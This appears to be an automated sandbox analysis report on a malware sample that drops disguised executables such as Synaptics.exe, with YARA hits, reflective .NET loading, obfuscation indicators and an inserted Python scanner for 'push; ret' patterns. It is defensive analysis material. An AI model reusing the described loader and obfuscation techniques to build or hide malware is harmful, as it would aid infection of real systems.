            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.3c60940.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.3d40940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4520940.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.379982346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430371740.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.378011350.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.404954241.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.314658286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.396965179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.389965974.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.386302469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.390367257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.399973811.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.313768043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441048593.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.381765881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.388606290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.312421482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429244511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.384393929.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.326093400.0000000003A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526573354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.383936753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417274835.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.382689406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.403730358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.381548795.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.408854727.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.392491539.0000000004159000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.400267484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.313014699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.427064129.0000000004359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.382444300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316511430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.401697054.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Source: y8kdmHi6x3.exe, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.0.y8kdmHi6x3.exe.5b0000.0.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.2.y8kdmHi6x3.exe.5b0000.0.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: Synaptics.exe.4.dr, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.2.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.13.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.25.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.0.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.15.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.5.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.y8kdmHi6x3.exe.bc0000.1.unpack, Loader/Nyan.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: C:\Users\user\Desktop\SYSTEM32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\SYSTEM32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Synaptics\Synaptics.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: y8kdmHi6x3.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: y8kdmHi6x3.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: y8kdmHi6x3.exe | Static file information: File size 2083328 > 1048576
            Source: y8kdmHi6x3.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1c8600
            Source: y8kdmHi6x3.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323334149.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: &C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323334149.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp

            Data Obfuscation

            Source: y8kdmHi6x3.exe, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.y8kdmHi6x3.exe.5b0000.0.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.y8kdmHi6x3.exe.5b0000.0.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: Synaptics.exe.4.dr, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.2.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.13.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.25.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.0.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.15.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.5.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.1.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.3.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.20.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.9.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.11.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.2.y8kdmHi6x3.exe.bc0000.4.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.y8kdmHi6x3.exe.bc0000.7.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: SYSTEM32.EXE.6.dr, mFomRpTnURes/BEzzbvoTDpsx.cs | .Net Code: ZfRHHqObaOVxIv System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, mFomRpTnURes/BEzzbvoTDpsx.cs | .Net Code: ZfRHHqObaOVxIv System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, mFomRpTnURes/BEzzbvoTDpsx.cs | .Net Code: ZfRHHqObaOVxIv System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.0.Synaptics.exe.bc0000.0.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.2.Synaptics.exe.bc0000.0.unpack, Loader/Nyan.cs | .Net Code: Initialize System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: ._cache_WINDOWS.EXE.9.dr, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ._cache_WINDOWS.EXE.9.dr, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 0_2_00FCF9C4 push 8402A7CFh; iretd 0_2_00FCF9C9
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 0_2_00FCFB60 pushfd ; iretd 0_2_00FCFB61
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00446564 push 004465F1h; ret 4_2_004465E9
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00406B3C push 00406B8Dh; ret 4_2_00406B85
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00478CB0 push 00478D2Dh; ret 4_2_00478D25
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00422044 push ecx; mov dword ptr [esp], edx 4_2_00422049
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0042E010 push 0042E03Ch; ret 4_2_0042E034
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0046C0B0 push ecx; mov dword ptr [esp], eax 4_2_0046C0B2
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004761F8 push 0047623Bh; ret 4_2_00476233
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0049419C push 004941CFh; ret 4_2_004941C7
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0042E1BC push 0042E1E8h; ret 4_2_0042E1E0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00480210 push 0048023Ch; ret 4_2_00480234
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004842DC push 00484308h; ret 4_2_00484300
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0048036C push 00480398h; ret 4_2_00480390
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0042C3D0 push 0042C3FCh; ret 4_2_0042C3F4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00432468 push 004324B4h; ret 4_2_004324AC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00486408 push 004864ADh; ret 4_2_004864A5
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0047C404 push 0047C430h; ret 4_2_0047C428
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00432404 push 00432447h; ret 4_2_0043243F
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004324C0 push 0043250Bh; ret 4_2_00432503
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0042C4C4 push 0042C4F0h; ret 4_2_0042C4E8
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004464FC push 00446562h; ret 4_2_0044655A
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00490554 push 00490580h; ret 4_2_00490578
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0047A514 push 0047A540h; ret 4_2_0047A538
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00432518 push 00432544h; ret 4_2_0043253C
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00496530 push 00496586h; ret 4_2_0049657E
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0048859C push 004885DEh; ret 4_2_004885D6
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00432650 push 004326C6h; ret 4_2_004326BE
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0049A6BC push 0049A745h; ret 4_2_0049A73D
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00480744 push 00480770h; ret 4_2_00480768
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0049A750 push 0049A776h; ret 4_2_0049A76E
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004730FC LoadLibraryA, GetProcAddress, SHGetSpecialFolderLocation, SHGetPathFromIDList, SHGetSpecialFolderLocation, SHGetPathFromIDList 4_2_004730FC
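Each 4_2_* entry above is a `push imm32` immediately followed by `ret`: a jump whose destination never appears as a call or jmp operand, so a static call graph does not see it. The following Python is an added example, not the sandbox's own detector: it byte-scans a code blob for the pattern and labels each hit by where the pushed target points. The input bytes are constructed here and mirror the 4_2_00446564 entry (push 004465F1h at 004465E4, ret at 004465E9); they are not extracted from the sample. One caveat worth keeping in mind when reading these entries: a target a few bytes ahead of the push inside the same section is also what ordinary compiler output looks like (Delphi's try/finally epilogue returns into the function this way), so such hits are weak evidence on their own, while a target outside the code section deserves a closer look.

```python
"""Find 'push imm32; ret' pairs in raw x86 code, the construct behind the report's
'Uses code obfuscation techniques (call, push, ret)' entries. Added example for
this page, not the sandbox's own detector."""
import struct
from typing import List, Tuple

PUSH_IMM32 = 0x68           # push imm32
RET_OPCODES = (0xC3, 0xC2)  # ret / ret imm16

Hit = Tuple[int, int, int]  # (push address, ret address, pushed target)


def find_push_ret(code: bytes, base: int, max_gap: int = 0) -> List[Hit]:
    """Linear byte scan (no disassembler), so it also catches pairs that sit outside
    recognised functions. max_gap=0 requires the ret to follow the push directly,
    which is the report's form; a small positive gap tolerates interleaved bytes at
    the cost of more false positives."""
    hits: List[Hit] = []
    for i in range(len(code) - 5):
        if code[i] != PUSH_IMM32:
            continue
        target = struct.unpack_from("<I", code, i + 1)[0]
        for j in range(i + 5, min(i + 5 + max_gap, len(code) - 1) + 1):
            if code[j] in RET_OPCODES:
                hits.append((base + i, base + j, target))
                break
    return hits


def classify(hit: Hit, base: int, size: int) -> str:
    """'push X; ret' is a jump to X in disguise. A near forward target in the same
    section is the shape compilers also emit; a target outside the section is the
    interesting kind."""
    push_va, _ret_va, target = hit
    if not base <= target < base + size:
        return "outside-section"
    return "in-section forward-near" if 0 < target - push_va < 0x400 else "in-section"


SAMPLE_BASE = 0x00446564  # constructed; mirrors the report's 4_2_00446564 entry
SAMPLE_CODE = (
    b"\x55\x8B\xEC" + b"\x90" * 125                               # prologue + filler up to offset 0x80
    + b"\x68" + struct.pack("<I", 0x004465F1) + b"\xC3"            # push 004465F1h; ret  (near, in-section)
    + b"\x90" * 8
    + b"\x68" + struct.pack("<I", 0x7FFE0000) + b"\xC2\x04\x00"    # push 7FFE0000h; ret 4 (outside the section)
    + b"\x68" + struct.pack("<I", 0x00446600) + b"\x8B\x45\x08"    # push followed by mov: not a pair
    + b"\xC3"
)


def scan_sample() -> List[Tuple[str, str]]:
    """Run the scanner over the constructed bytes and label each hit."""
    out = []
    for push_va, ret_va, target in find_push_ret(SAMPLE_CODE, SAMPLE_BASE):
        label = classify((push_va, ret_va, target), SAMPLE_BASE, len(SAMPLE_CODE))
        out.append((f"{push_va:08X} push {target:08X}h; ret {ret_va:08X}", label))
    return out


if __name__ == "__main__":
    for line, label in scan_sample():
        print(f"{line}  [{label}]")
```

Point it at a dumped section (the `.raw.unpack` files listed above, with the section's virtual address as `base`) rather than a whole PE, otherwise header and data bytes produce spurious 0x68/0xC3 coincidences; the `max_gap` knob is there for stubs that pad between the push and the ret.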
            Source: WINDOWS.EXE.6.dr | Static PE information: real checksum: 0x0 should be: 0xff011
            Source: y8kdmHi6x3.exe | Static PE information: real checksum: 0x0 should be: 0x2013d1
            Source: Synaptics.exe.4.dr | Static PE information: real checksum: 0x0 should be: 0x2013d1
            Source: SYSTEM32.EXE.6.dr | Static PE information: real checksum: 0x0 should be: 0x10e22
            Source: ._cache_WINDOWS.EXE.9.dr | Static PE information: real checksum: 0x0 should be: 0x38554
            Source: ._cache_y8kdmHi6x3.exe.4.dr | Static PE information: real checksum: 0x1c288 should be: 0x11595d
            Source: initial sample | Static PE information: section name: .text entropy: 7.99980395725
            Source: initial sample | Static PE information: section name: .text entropy: 7.99980395725
            Source: ._cache_WINDOWS.EXE.9.dr, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
